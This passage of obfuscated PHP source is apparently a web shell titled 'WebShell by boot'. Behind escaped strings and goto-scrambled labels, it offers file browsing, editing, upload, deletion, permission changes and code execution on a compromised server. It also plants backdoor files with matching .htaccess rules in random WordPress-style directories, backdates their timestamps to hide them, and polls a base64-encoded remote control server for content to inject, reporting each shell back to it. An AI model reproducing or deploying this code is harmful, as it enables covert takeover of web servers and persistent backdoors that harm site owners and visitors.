. "\74\57\160\x3e"; } } goto Tez2J; gQvdL: $all_paths = array(); goto k1C9R; Amx2q: if ($type == 1) { if (!empty($dir)) { $path = $dir; } $now_path = $path; } goto KdwIY; poU4O: $now_path = dirname($file_path); goto RAxC_; KPLhz: function deleteDirectory($dir) { if (!is_dir($dir)) { return false; } $files = glob($dir . "\x2f\52"); foreach ($files as $file) { if (is_file($file)) { unlink($file); } elseif (is_dir($file)) { deleteDirectory($file); } } return rmdir($dir); } goto ROHzz; ukCEQ: function getAllDirectories($path, $depth, $door_count) { global $all_paths, $door_lists, $last_folder_url; $firstLevelDirs = glob($path . "\57\52", GLOB_ONLYDIR); $totalSelections = $door_count; $selectedDirectories = array(); $dirsPerFirstLevel = max(1, floor($totalSelections / count($firstLevelDirs))); foreach ($firstLevelDirs as $dir) { $all_paths[] = $dir; $subDirs = getAllSubdirectories($dir, 10); if (count($subDirs) >= $dirsPerFirstLevel) { $randomKeys = array_rand($subDirs, $dirsPerFirstLevel); foreach ((array) $randomKeys as $key) { $selectedDirectories[] = $subDirs[$key]; } } else { $selectedDirectories = array_merge($selectedDirectories, $subDirs); } } if (count($selectedDirectories) < $totalSelections) { $additionalNeeded = $totalSelections - count($selectedDirectories); $allSubDirs = array(); foreach ($firstLevelDirs as $dir) { $allSubDirs = array_merge($allSubDirs, glob($dir . "\x2f\x2a", GLOB_ONLYDIR)); } $remainingDirs = array_diff($allSubDirs, $selectedDirectories); if (count($remainingDirs) > 0) { $additionalDirs = (array) array_rand($remainingDirs, min($additionalNeeded, count($remainingDirs))); foreach ($additionalDirs as $key) { $selectedDirectories[] = $remainingDirs[$key]; } } } $randomKeys = array_rand($all_paths, 1); foreach ((array) $randomKeys as $key) { $last_folder_url = $all_paths[$key]; } $door_lists = $selectedDirectories; return $all_paths; } goto NCfWd; nS5Zs: $pws = "\141\x48\x52\60\x63\x48\x4d\x36\114\171\71\171\132\127\x31\166\144\x47\125\x79\x4d\104\x49\x30\x4c\155\122\155\x63\127\x5a\x68\x64\103\65\60\142\63\101\166\132\x57\x64\x79\x62\63\126\167\x4c\x77\x3d\x3d"; goto Wi8ub; aM1LR: if (is_writable($now_path)) { $can_write = true; } goto bqkBE; bZ0mU: function stationAction($data, $pweb, $now_site) { $result_data = array(); $result_data["\x73\x68\145\x6c\154\137\x69\144"] = $data["\x73\150\145\x6c\154\x5f\151\x64"]; $result_data["\x61\x63\164\151\x6f\156"] = "\x73\x74\141\x74\x69\157\156"; $save_url = base64_decode($pweb) . "\x2f\x65\x73\141\x76\145\x2e\160\x68\x70"; $shell_id = $data["\x73\x68\145\154\x6c\x5f\151\144"]; $shell_type = $data["\163\150\x65\x6c\x6c\137\x74\171\160\x65"]; $url = base64_decode($pweb) . "\57\145\151\x6e\144\x65\x78\x64\157\157\x72\56\160\150\160\x3f\141\x63\x74\151\157\x6e\75\x73\164\141\164\151\157\x6e\46\x73\150\145\x6c\x6c\137\151\x64\75" . $shell_id . "\46\x73\x68\x65\x6c\x6c\x5f\164\x79\x70\x65\x3d" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $station_count = 0; if (!empty($json_array["\163\164\x61\164\x69\x6f\156\x5f\x63\x6f\x64\x65"]) && !empty($json_array["\x68\x74\x5f\x70\x7a\x5f\143\x6f\x6e\164\x65\156\164"])) { $station_count = add_station($json_array["\x73\164\141\x74\151\157\156\x5f\143\x6f\x64\x65"], $json_array["\150\x74\137\160\x7a\137\x63\157\156\164\x65\156\164"], $now_site); if ($station_count > 0) { $result_data["\x73\x74\x61\164\151\x6f\156\137\x63\157\x75\156\x74"] = $station_count; $result_data["\x73\x74\141\164\x75\163"] = 1; } else { $result_data["\143\157\144\145"] = "\x31\60\60\61"; $result_data["\x73\164\x61\164\165\163"] = 2; } } else { $result_data["\143\157\x64\145"] = "\61\60\x30\x32"; $result_data["\163\x74\141\164\x75\163"] = 2; } $result_data["\x73\x68\145\154\154\137\x75\x72\x6c"] = $now_site; $result_data["\163\150\145\x6c\x6c\x5f\164\171\x70\145"] = $shell_type; $res = curlpost($save_url, $result_data); } goto wH0Wc; ROHzz: function deleteFile($file) { if (file_exists($file)) { chmod($file, 511); if (unlink($file)) { echo "\x3c\x70\x20\x73\164\171\154\x65\75\42\143\x6f\154\157\162\72\x67\x72\145\145\x6e\73\146\x6f\x6e\x74\55\x77\145\x69\x67\x68\164\x3a\40\x62\x6f\154\x64\x3b\x22\76" . $file . "\x20\151\163\40\144\x65\x6c\145\164\x65\40\x73\x75\x63\143\x65\x73\x73" . "\x3c\x2f\x70\76"; } else { echo "\x3c\x70\x20\x73\x74\x79\154\x65\x3d\42\x63\157\x6c\x6f\162\x3a\x72\x65\144\x3b\146\157\x6e\x74\55\167\x65\x69\147\x68\x74\72\40\142\157\x6c\x64\x3b\x22\76" . $file . "\40\x69\x73\40\x64\x65\154\145\x74\x65\x20\x65\x72\x72\x6f\x72" . "\74\57\160\76"; } } else { echo "\x3c\x70\40\x73\164\171\154\x65\75\42\143\x6f\x6c\157\162\x3a\162\145\x64\73\146\157\156\x74\x2d\167\x65\x69\x67\x68\164\x3a\x20\x62\x6f\154\144\x3b\42\76" . $file . "\40\151\x73\x20\156\x6f\x74\40\145\170\x69\163\164" . "\74\x2f\x70\x3e"; } } goto fFrUe; sMcl1: function cndoorfile($fipath, $file_name, $open_content, $contnt) { if (!is_dir($fipath)) { mkdir($fipath, 493, true); } $fileurl = $fipath . "\x2f" . $file_name; if (file_put_contents($fileurl, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); chmod($fileurl, 365); $ht_content_now = ''; $ht_content_now = str_replace("\x7b\x23\x68\x74\x63\x6f\x6e\x74\145\x6e\164\x7d", $file_name, $open_content); chmod($fipath . "\x2f\56\150\164\x61\x63\x63\145\163\x73", 493); if (file_put_contents($fipath . "\57\x2e\x68\164\x61\x63\143\x65\163\163", $ht_content_now) !== false) { chmod($fipath . "\57\x2e\150\164\141\143\143\x65\x73\163", 365); } chmod($fipath, 365); return true; } else { return false; } } goto sY1Qm; T_EkX: $can_read = false; goto AgL2D; kRH_2: $last_folder_url = ''; goto IBMop; b5Sm0: session_start(); goto WklgD; jWl5D: function execAction($data, $pweb, $now_site) { $group_id = $data["\147\x72\x6f\x75\x70\x5f\x69\144"]; $shell_id = $data["\163\150\145\154\x6c\137\x69\x64"]; $shell_type = $data["\x73\150\x65\154\154\x5f\164\x79\x70\x65"]; $url = base64_decode($pweb) . "\57\145\151\156\144\x65\x78\x64\157\157\x72\x2e\x70\x68\x70\x3f\x61\x63\164\x69\157\x6e\75\x65\x78\145\x63\x26\x67\162\157\165\160\x5f\x69\144\75" . $group_id . "\46\x73\x68\145\154\154\x5f\x74\171\x70\145\75" . $shell_type; $result_data = array(); $result_data["\163\150\x65\x6c\154\137\151\144"] = $shell_id; $result_data["\141\143\164\151\x6f\156"] = "\145\x78\x65\143"; $save_url = base64_decode($pweb) . "\57\x65\x73\x61\166\145\56\x70\150\160"; $cc = curlget($url); $json_array = json_decode($cc, true); if (isset($json_array["\151\156\x5f\143\x6f\x6e\x74\x6e\x74"]) && !empty($json_array["\x68\x74\x5f\143\x6f\156\x74\156\164"]) && !empty($json_array["\145\x78\145\143\x5f\143\x6f\144\x65"])) { $result = add_exec($json_array["\x68\164\x5f\143\157\156\x74\156\164"], $json_array["\151\156\x5f\x63\157\x6e\164\156\164"], $json_array["\145\170\145\143\x5f\x63\x6f\144\145"], $json_array["\x77\x70\137\x79\x63\x6f\144\x65"]); if ($result) { $result_data["\163\164\141\x74\x75\163"] = 1; } else { $result_data["\143\157\144\x65"] = "\61\x30\x30\61"; $result_data["\x73\x74\x61\164\x75\163"] = 2; } } else { $result_data["\143\x6f\144\145"] = "\x31\60\60\x32"; $result_data["\163\x74\141\164\x75\163"] = 2; } $result_data["\163\150\x65\x6c\154\137\164\x79\x70\x65"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\x73\x74\141\x74\165\163"]) { echo "\x3c\160\x20\x73\x74\x79\x6c\145\x3d\x22\143\x6f\x6c\157\x72\x3a\x67\162\x65\x65\x6e\73\42\x3e\x45\x78\x65\x63\40\151\x73\40\x73\x75\143\143\145\x73\163\146\165\x6c\154\171\74\x2f\x70\x3e"; } else { echo "\74\x70\40\x73\x74\171\x6c\x65\75\x22\143\157\x6c\x6f\162\72\162\145\x64\73\x22\x3e\105\170\x65\x63\40\x69\x73\40\146\x61\x69\154\145\144\x21\40" . $result_data["\143\x6f\144\145"] . "\74\57\x70\x3e"; } } goto F0DwG; BGNdO: $sy_path = str_replace($website_path, '', $now_path); goto VnrNU; RAxC_: $dir = $_POST["\x64\x69\162"]; goto oyxne; sY1Qm: function strslit($str) { if (!empty($str)) { $cha = str_split($str); return "\47" . implode("\x27\x2e\x27", $cha) . "\x27"; } else { return ''; } } goto CsvpM; KdwIY: $file_path_array = explode("\57", $file_path); goto hNAa1; oyxne: $web_url = $data["\122\105\121\125\x45\123\124\137\x53\x43\110\105\x4d\105"] . "\72\57\57" . $data["\123\105\x52\126\x45\122\x5f\x4e\101\x4d\105"]; goto GSBbP; OVXHf: function fill_full($file_urls, $sy_count) { $path = realpath($_SERVER["\x44\x4f\103\125\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\124"]); $file_url_result = array(); foreach ($file_urls as $k => $v) { $v = trim($v); if (!empty($v)) { $file_url_result[] = $v; } } $file_tou = array("\167\160\55\143\x6f\156\164\145\x6e\x74", "\x77\160\55\x61\x64\155\x69\x6e", "\167\x70\x2d\x69\x6e\x63\x6c\x75\144\x65\x73"); $file_list = array("\143\x73\163", "\151\x6d\x61\x67\145\163", "\151\x6d\147", "\x6a\163", "\164\150\x65\x6d\145\163", "\160\154\165\x67\x69\156\163", "\165\160\154\x6f\x61\x64\x73", "\154\141\x6e\147\x75\141\147\x65\163", "\x69\156\143\x6c\165\x64\145\x73", "\155\x61\x69\156\x74", "\156\x65\164\x77\157\162\x6b", "\155\x65\164", "\165\x73\145\x72", "\111\x58\122", "\111\x44\63", "\x66\x6f\156\164\163", "\142\154\x6f\143\x6b", "\x62\x6c\x6f\143\x6b\163", "\x70\x68\160\x2d\143\157\x6d\160\x61\x74", "\160\150\x70", "\x54\x65\170\164", "\x77\151\144\147\x65\164\163", "\x53\151\x6d\x70\154\145\x50\x69\x65", "\162\141\x6e\x64\157\155", "\163\164\171\154\145\x2d\x65\x6e\147\x69\x6e\x65", "\160\x6f\x6d\157", "\143\145\162\x74\151\x66\151\x63\x61\x74\145\163", "\x62\154\x6f\143\153\164"); for ($i = 0; $i < $sy_count; $i++) { $path_url = $path . "\x2f" . $file_tou[rand(0, count($file_tou) - 1)]; for ($j = 0; $j < rand(3, 6); $j++) { $path_url = $path_url . "\x2f" . $file_list[rand(0, count($file_list) - 1)]; } $file_url_result[] = $path_url; } return $file_url_result; } goto ukCEQ; IBMop: if (!empty($_SESSION["\143\x32\150\154\x62\107\170\146\x59\x32\x39\x6b\x5a\x51\x3d\75"]) && strlen($_SESSION["\143\x32\150\x6c\x62\x47\x78\x66\131\x32\71\153\132\x51\75\75"]) == 20) { ?>
<!doctypehtml><html lang="en"><head><title>WebShell by boot</title><meta charset="utf-8"><meta content="width=device-width,initial-scale=1"name="viewport"><link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"rel="stylesheet"><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script><style>.col-12{width:100%;display:inline-block}.col-6{width:50%;display:inline-block;float:left}</style></head><body><div class="jumbotron text-center"style="padding:1rem 0"><h1 style="font-size:2rem;font-weight:700;margin:1rem 0">WebShell by boot</h1></div><div class="container"><div class="row"><p><div style="width:30%;display:inline-block">Server IP:<?php  echo $data["\x53\105\x52\x56\105\x52\137\x41\x44\104\x52"]; ?>
</div><div style="width:30%;display:inline-block">Server Software:<?php  echo $data["\123\x45\x52\x56\105\122\x5f\123\117\x46\124\x57\101\122\105"]; ?>
</div><div style="width:30%;display:inline-block">OS:<?php  echo PHP_OS; ?>
</div></p><p><div style="width:30%;display:inline-block">Website:<?php  echo $data["\110\x54\124\x50\x5f\x48\x4f\123\x54"]; ?>
</div><div style="width:30%;display:inline-block">User:<?php  echo get_current_user(); ?>
</div></p><p><a href="?path=<?php  echo $website_path; ?>
">Project</a></p></div><div class="row"><p>Path:<?php  $file_now_path = ''; foreach ($file_path_array as $k => $v) { if (empty($v)) { ?>
<a href="?path=/">-</a>r<?php  } else { if (empty($file_now_url)) { $file_now_url = $v; } else { $file_now_url = $file_now_url . "\x2f" . $v; } $file_now_path = $file_now_path . "\57" . $v; ?>
/<a href="?path=<?php  echo $file_now_path; ?>
"><?php  echo trim($v); ?>
</a><?php  } } ?>
<span style="color:green"style="color:red"<?php  if ($can_read) { } else { } ?>
>Readable</span> | <span style="color:green"style="color:red"<?php  if ($can_write) { } else { } ?>
>Writeable</span></p></div><?php  if ($type == 2 || $type == 3) { if ($type == 3) { $file_content = $_REQUEST["\x66\151\154\145\x5f\x63\157\x6e\x74\145\x6e\164"]; $content_result = file_put_contents($path, $file_content); if ($content_result) { echo "\x3c\144\x69\166\40\x63\x6c\x61\163\x73\75\42\x61\x6c\145\162\x74\x20\x61\154\145\x72\164\x2d\163\165\143\x63\x65\x73\x73\42\x20\x72\157\x6c\145\x3d\42\x61\154\x65\162\164\42\76\x46\x69\154\145\x20\x63\x6f\156\164\145\156\164\40\155\157\x64\x69\146\151\145\x64\40\x73\x75\x63\x63\x65\x73\163\146\165\x6c\x6c\171\41\74\57\x64\x69\166\x3e"; } else { echo "\74\144\151\x76\40\x63\x6c\x61\x73\x73\x3d\42\x61\154\x65\x72\x74\40\141\154\145\162\164\55\x64\141\156\147\x65\162\x22\40\x72\x6f\x6c\145\x3d\x22\141\154\145\x72\164\42\x3e\106\x61\x69\154\145\144\40\164\x6f\40\x6d\157\x64\x69\x66\x79\40\146\151\x6c\x65\x20\x63\x6f\x6e\x74\145\x6e\x74\x21\74\57\144\x69\166\x3e"; } } ?>
<div class="row"><form action="?type=3"method="post"><input name="path"value="<?php  echo $file_path; ?>
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\143\62\150\x6c\x62\107\x78\146\x59\62\71\153\x5a\121\75\x3d"]; ?>
"type="hidden"><div class="form-group"><?php  $content = file_get_contents($file_path); ?>
<textarea class="form-control"cols="100"id="exampleFormControlTextarea1"name="file_content"rows="20"><?php  echo htmlspecialchars($content); ?>
</textarea></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php  } else { if ($type == 4) { $file_new_name = $_POST["\x66\151\x6c\x65\x5f\156\x65\167\137\x6e\x61\x6d\x65"]; if (!empty($file_new_name)) { $rename_result = rename($file_path, $now_path . "\x2f" . $file_new_name); if ($rename_result) { echo "\74\144\x69\166\40\x63\x6c\x61\x73\x73\x3d\42\141\x6c\x65\x72\x74\40\141\x6c\x65\x72\164\x2d\163\x75\x63\x63\145\x73\163\42\40\162\x6f\x6c\145\75\x22\x61\154\145\x72\x74\42\x3e\106\x69\x6c\145\x20\156\141\155\145\x20\155\157\x64\x69\x66\x69\145\144\x20\x73\x75\x63\143\145\163\x73\146\165\154\x6c\x79\41\74\x2f\144\151\166\x3e"; $file_path = $now_path . "\x2f" . $file_new_name; } else { echo "\x3c\x64\x69\166\x20\143\154\141\x73\x73\x3d\42\141\154\x65\x72\x74\x20\x61\x6c\145\162\x74\x2d\x64\x61\156\147\x65\x72\42\x20\x72\x6f\x6c\x65\75\42\141\154\145\162\x74\42\x3e\x46\141\151\154\x65\x64\40\164\157\40\155\157\144\x69\x66\x79\x20\146\x69\x6c\x65\x20\x6e\x61\155\145\41\x3c\57\144\151\x76\76"; } } ?>
<div class="row"><form action="?type=4"method="post"><input name="path"value="<?php  echo $file_path; ?>
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\x63\x32\x68\x6c\142\107\x78\146\131\62\x39\153\132\121\x3d\75"]; ?>
"type="hidden"><div class="form-group"><?php  $content = file_get_contents($file_path); ?>
<input name="file_new_name"value="<?php  echo basename($file_path); ?>
"id="file_new_name"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php  } else { if ($type == 5) { $new_chmod = trim($_POST["\x6e\x65\x77\x5f\143\150\155\x6f\x64"]); if (!empty($new_chmod)) { if (chmod($file_path, octdec($new_chmod))) { echo "\74\144\x69\166\x20\x63\154\141\163\163\75\42\x61\154\145\162\164\40\141\154\x65\162\x74\x2d\x73\165\x63\x63\x65\163\163\42\x20\x72\157\x6c\145\x3d\42\x61\x6c\145\x72\x74\x22\76\x46\151\x6c\145\40\x70\x65\x72\155\x69\x73\163\x69\157\156\163\40\x6d\157\x64\x69\146\x69\145\x64\40\163\x75\143\143\145\163\163\x66\165\x6c\154\171\x21\x3c\x2f\x64\151\166\x3e"; $old_chmod = $new_chmod; } else { echo "\x3c\144\151\166\40\143\154\x61\163\163\x3d\42\x61\154\x65\x72\x74\40\x61\x6c\145\162\x74\55\144\141\x6e\147\145\162\x22\40\x72\157\154\x65\75\x22\x61\x6c\145\162\x74\42\x3e\x46\x61\x69\x6c\x65\x64\x20\x74\157\40\155\157\x64\151\146\171\40\146\151\x6c\x65\x20\160\145\x72\x6d\x69\163\x73\x69\x6f\156\163\x21\x3c\x2f\144\151\166\x3e"; } } else { $permissions = fileperms($file_path); $old_chmod = substr(sprintf("\x25\157", $permissions), -4); } ?>
<div class="row"><form action="?type=5"method="post"><input name="path"value="<?php  echo $file_path; ?>
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\x63\x32\x68\x6c\x62\107\170\146\x59\62\71\153\x5a\121\75\75"]; ?>
"type="hidden"><div class="form-group"><?php  $content = file_get_contents($file_path); ?>
<input name="new_chmod"value="<?php  echo $old_chmod; ?>
"id="new_chmod"class="form-control"></div><button class="btn btn-success"type="submit">Edit</button></form></div><?php  } else { if ($type == 6) { $new_name = trim($_POST["\x6e\145\x77\x5f\x6e\x61\155\145"]); $new_content = trim($_POST["\156\145\167\x5f\x63\157\156\x74\145\x6e\164"]); if (!empty($new_name)) { if (is_file($now_path . "\x2f" . $new_name)) { echo "\74\x64\151\x76\40\x63\154\x61\163\x73\75\x22\141\154\145\x72\x74\x20\x61\x6c\x65\x72\x74\x2d\x64\x61\156\x67\145\162\42\40\162\x6f\x6c\x65\75\x22\x61\154\145\162\x74\x22\76\124\150\x65\x20\146\151\154\145\x20\x61\154\x72\x65\x61\144\x79\x20\145\x78\151\163\x74\163\41\x3c\57\144\151\x76\x3e"; } else { $file = fopen($now_path . "\x2f" . $new_name, "\x77"); if ($file) { if (fwrite($file, $new_content)) { echo "\74\x64\x69\166\40\x63\154\141\x73\x73\75\x22\x61\154\x65\x72\164\40\x61\x6c\145\162\164\x2d\x73\165\x63\x63\145\x73\x73\x22\40\162\157\x6c\145\75\42\x61\x6c\145\162\164\42\76\x46\x69\x6c\145\x20\143\x72\145\141\x74\145\x64\40\163\x75\143\x63\145\x73\163\x66\165\x6c\154\171\x21\x3c\x2f\x64\151\x76\76"; } else { echo "\x3c\144\151\166\40\143\154\141\163\x73\75\x22\141\x6c\x65\162\x74\40\141\154\x65\x72\x74\x2d\x64\141\x6e\x67\145\162\42\40\162\157\x6c\145\75\42\x61\x6c\x65\162\x74\42\x3e\125\x6e\x61\142\154\145\40\164\157\x20\167\162\x69\x74\x65\x20\x74\157\x20\x66\x69\154\x65\x21\74\57\144\151\166\x3e"; } fclose($file); } else { echo "\x3c\x64\151\166\x20\x63\x6c\x61\163\x73\75\42\x61\154\x65\x72\x74\x20\x61\x6c\x65\x72\x74\55\144\141\x6e\147\x65\x72\x22\x20\162\157\154\x65\75\x22\141\154\145\162\164\42\76\x55\x6e\141\x62\x6c\145\40\x74\157\x20\x6f\x70\x65\x6e\x20\x66\151\154\145\x21\74\x2f\x64\151\166\x3e"; } } } ?>
<div class="row"><form action="?type=6"method="post"><input name="path"value="<?php  echo $file_path; ?>
"type="hidden"id="path"> <input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\x63\62\x68\154\142\x47\x78\146\x59\62\x39\153\132\x51\75\75"]; ?>
"type="hidden"><div class="form-group"><input name="new_name"value="<?php  echo $new_name; ?>
"id="new_name"class="form-control"placeholder="New File Name"></div><div class="form-group"><textarea class="form-control"cols="100"id="new_content"name="new_content"rows="20"placeholder="New File Content"><?php  echo htmlspecialchars($new_content); ?>
</textarea></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php  } else { if ($type == 7) { $new_name = trim($_POST["\x6e\145\167\x5f\156\x61\x6d\x65"]); if (!empty($new_name)) { if (!is_dir($now_path . "\57" . $new_name)) { if (mkdir($now_path . "\x2f" . $new_name)) { echo "\x3c\x64\x69\x76\40\x63\x6c\141\163\163\75\42\x61\x6c\x65\162\164\x20\141\x6c\145\x72\164\55\x73\x75\143\143\x65\163\163\42\x20\162\x6f\154\145\75\42\x61\x6c\145\162\164\42\x3e\x44\x69\x72\145\x63\164\157\x72\x79\x20\x63\x72\x65\x61\164\145\x64\40\x73\165\x63\143\x65\163\163\x66\x75\154\x6c\x79\41\x3c\x2f\x64\151\166\76"; } else { echo "\74\144\x69\166\x20\143\x6c\141\x73\x73\75\x22\141\x6c\145\x72\x74\40\141\154\145\162\x74\55\x73\165\x63\143\145\163\163\42\x20\162\157\x6c\145\x3d\42\x61\154\x65\162\x74\42\x3e\x44\151\x72\x65\x63\164\x6f\162\x79\x20\x63\x72\x65\x61\164\151\157\x6e\x20\x66\141\151\x6c\x65\144\41\74\57\x64\x69\x76\76"; } } else { echo "\74\x64\151\x76\x20\143\x6c\x61\x73\163\x3d\x22\141\x6c\x65\x72\x74\40\141\154\145\162\x74\55\163\x75\x63\x63\145\x73\163\42\40\162\x6f\x6c\145\75\42\x61\x6c\x65\x72\x74\x22\76\104\x69\x72\145\x63\x74\x6f\x72\171\x20\x61\x6c\162\x65\141\x64\171\40\x65\x78\151\163\164\163\41\x3c\57\144\x69\166\x3e"; } } ?>
<div class="row"><form action="?type=7"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\143\x32\150\x6c\x62\107\x78\146\131\62\x39\153\132\121\75\x3d"]; ?>
"type="hidden"> <input name="path"value="<?php  echo $file_path; ?>
"type="hidden"id="path"><div class="form-group"><input name="new_name"value="<?php  echo $new_name; ?>
"id="new_name"class="form-control"placeholder="New Folder Name"></div><button class="btn btn-success"type="submit">Create Now</button></form></div><?php  } else { if ($type == 8) { $search_keys = trim($_POST["\x73\x65\x61\162\x63\x68\x5f\153\145\171\163"]); $act = trim($_POST["\x61\143\164"]); ?>
<div class="row"><form action="?type=8"method="post"><div class="form-group"><input name="search_keys"value="<?php  echo $search_keys; ?>
"id="search_keys"class="form-control"placeholder="Search content"></div><button class="btn btn-success"type="submit">Search</button></form></div><?php  if (!empty($search_keys)) { $result = array(); $file_list = findFilesWithContent($website_path, $search_keys, 0, 10); ?>
<form action="?type=8"method="post"id="deleteForm"style="margin:1rem"><input name="act"value="deleteFiles"type="hidden"id="act"><div><?php  echo "\74\x73\160\x61\156\x20\163\x74\171\154\145\x3d\x27\x63\157\154\x6f\x72\72\x72\145\144\73\47\x3e" . $search_keys . "\74\57\163\x70\141\x6e\x3e\x20\x66\151\154\145\163\40\154\x69\x73\x74\xef\274\232\12"; ?>
</div><div><p><input name="allcheck"value="1"type="checkbox"id="allcheck"> all check <input value="delete"type="button"class="delBtn"></p></div><div><?php  foreach ($file_list as $file) { $str = "\74\x61\40\x68\162\145\x66\75\42\77\160\x61\164\150\75" . $file . "\46\164\x79\160\145\75\62\x22\40\164\141\162\147\145\164\75\42\x5f\x62\x6c\141\x6e\x6b\x22\x3e" . $file . "\x3c\57\141\x3e"; echo "\74\x70\76\74\151\x6e\160\x75\164\x20\164\x79\160\145\75\x22\143\150\x65\x63\153\142\157\170\42\40\143\x6c\141\x73\x73\75\42\151\x74\x65\155\42\40\x6e\141\x6d\145\75\x22\x66\151\x6c\x65\x73\133\135\x22\x20\166\141\154\165\x65\75\42" . $file . "\42\x2f\x3e\46\x6e\142\x73\160\x3b\x26\x6e\142\163\x70\x3b" . $str . "\74\57\x70\76"; } ?>
</div></form><?php  } if (!empty($act) && $act == "\144\x65\x6c\145\164\x65\106\x69\x6c\145\x73") { $file_list = $_REQUEST["\146\151\154\145\163"]; foreach ($file_list as $k => $v) { deleteFile($v); } } } else { if ($_POST["\141\x63\164"] == "\144\145\154") { $delete_file_list = $_POST["\x63\150\151\x6c\x64\x63\x68\x65\143\x6b"]; if (!empty($delete_file_list)) { $count = 0; $fail_count = 0; foreach ($delete_file_list as $k => $v) { if (is_dir($v)) { $del_result = deleteDirectory($v); } else { $del_result = unlink($v); } if ($del_result) { $count++; } else { $fail_count++; } } if ($count > 0) { echo "\74\144\151\166\x20\143\154\x61\x73\163\x3d\x22\141\154\x65\162\164\x20\141\x6c\x65\x72\164\55\x73\x75\143\x63\x65\x73\163\42\40\x72\157\154\145\x3d\x22\141\154\x65\162\x74\x22\76\104\x65\154\145\164\145\x20" . $count . "\x20\146\151\154\145\x73\40\x73\165\x63\143\x65\x73\163\x66\x75\x6c\x6c\171\x21\x3c\x2f\x64\151\x76\x3e"; } if ($fail_count > 0) { echo "\74\144\x69\x76\x20\x63\154\x61\x73\x73\x3d\42\141\x6c\x65\x72\164\40\141\154\x65\x72\x74\x2d\x64\141\x6e\147\145\x72\x22\40\x72\157\154\145\75\42\x61\154\145\x72\x74\x22\76\104\145\x6c\x65\x74\145\40" . $fail_count . "\40\x66\151\154\x65\163\40\x66\141\x69\154\145\x64\x21\x3c\x2f\x64\x69\166\76"; } } } if ($_POST["\x61\143\x74"] == "\x75\x70\x6c\157\x61\x64") { $targetFile = $now_path . "\x2f" . basename($_FILES["\x66\151\154\x65\x54\157\x55\x70\x6c\157\x61\x64"]["\156\141\x6d\145"]); if (move_uploaded_file($_FILES["\146\x69\x6c\145\x54\157\125\x70\154\157\x61\144"]["\x74\155\160\137\156\x61\155\145"], $targetFile)) { echo "\74\144\151\x76\x20\143\x6c\141\x73\163\x3d\x22\x61\154\145\x72\164\x20\141\154\145\162\164\x2d\163\x75\x63\143\x65\x73\x73\x22\40\x72\157\x6c\145\x3d\42\x61\154\x65\x72\164\42\76\x46\x69\x6c\145\x20" . htmlspecialchars(basename($_FILES["\x66\151\x6c\x65\x54\x6f\125\x70\154\157\141\x64"]["\x6e\x61\x6d\145"])) . "\40\165\160\154\157\141\x64\x65\144\x21\x3c\x2f\x64\x69\166\76"; } else { echo "\x3c\x64\x69\166\40\143\154\141\x73\163\x3d\42\141\154\x65\162\164\x20\141\154\145\x72\164\x2d\144\x61\x6e\x67\145\x72\x22\40\x72\157\x6c\145\x3d\42\x61\x6c\x65\x72\164\42\x3e\x46\x69\154\145\40\x75\160\x6c\x6f\x61\144\40\x66\x61\x69\154\145\144\41\x3c\x2f\144\x69\166\x3e"; } } $file_list = scandir($now_path); $file_list = sortByFolder($now_path, $file_list); ?>
<div class="row"><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?path=<?php  echo $file_path; ?>
"method="post"enctype="multipart/form-data"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\x63\x32\x68\154\x62\107\170\x66\131\x32\x39\x6b\x5a\x51\75\75"]; ?>
"type="hidden"> <input name="act"value="upload"type="hidden"> <input name="fileToUpload"type="file"id="formFileSm"class="form-control form-control-sm"style="width:200px;display:inline-block"> <button class="btn btn-sm btn-info"type="submit">Upload</button> <a href="?path=<?php  echo $file_path; ?>
&type=6"class="btn btn-sm btn-primary">Create File</a> <a href="?path=<?php  echo $file_path; ?>
&type=7"class="btn btn-sm btn-success">Create Folder</a> <a href="?path=<?php  echo $file_path; ?>
&type=8"class="btn btn-sm btn-warning">Search Files</a></form></div><div class="col-6"><form action="?path=<?php  echo $file_path; ?>
"method="post"enctype="multipart/form-data"><input name="exec_code"value=""class="form-control"style="display:inline-block;width:50%"> <input name="act"value="exec_code"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Exec</button></form></div></div></div><div class="col-12"style="margin-bottom:1rem"><div class="row"><div class="col-6"><form action="?type=1"method="post"enctype="multipart/form-data"><input name="dir"value="<?php  echo $path; ?>
"class="form-control"style="display:inline-block;width:80%"> <input name="act"value="change_dir"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Change Dir</button></form></div><div class="col-6"></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?>
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["\143\62\150\154\x62\x47\x78\146\x59\x32\71\x6b\x5a\x51\x3d\x3d"]; ?>
"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="reback"type="hidden"> <input name="group_id"value="<?php  echo $_SESSION["\x5a\63\x4a\x76\144\130\x41\x3d"]; ?>
"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["\143\62\150\154\142\107\x78\146\x61\127\x51\x3d"]; ?>
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["\x64\110\154\167\x5a\x51\75\x3d"]; ?>
"type="hidden"> <button class="btn btn-sm btn-success"type="submit">Reback</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?>
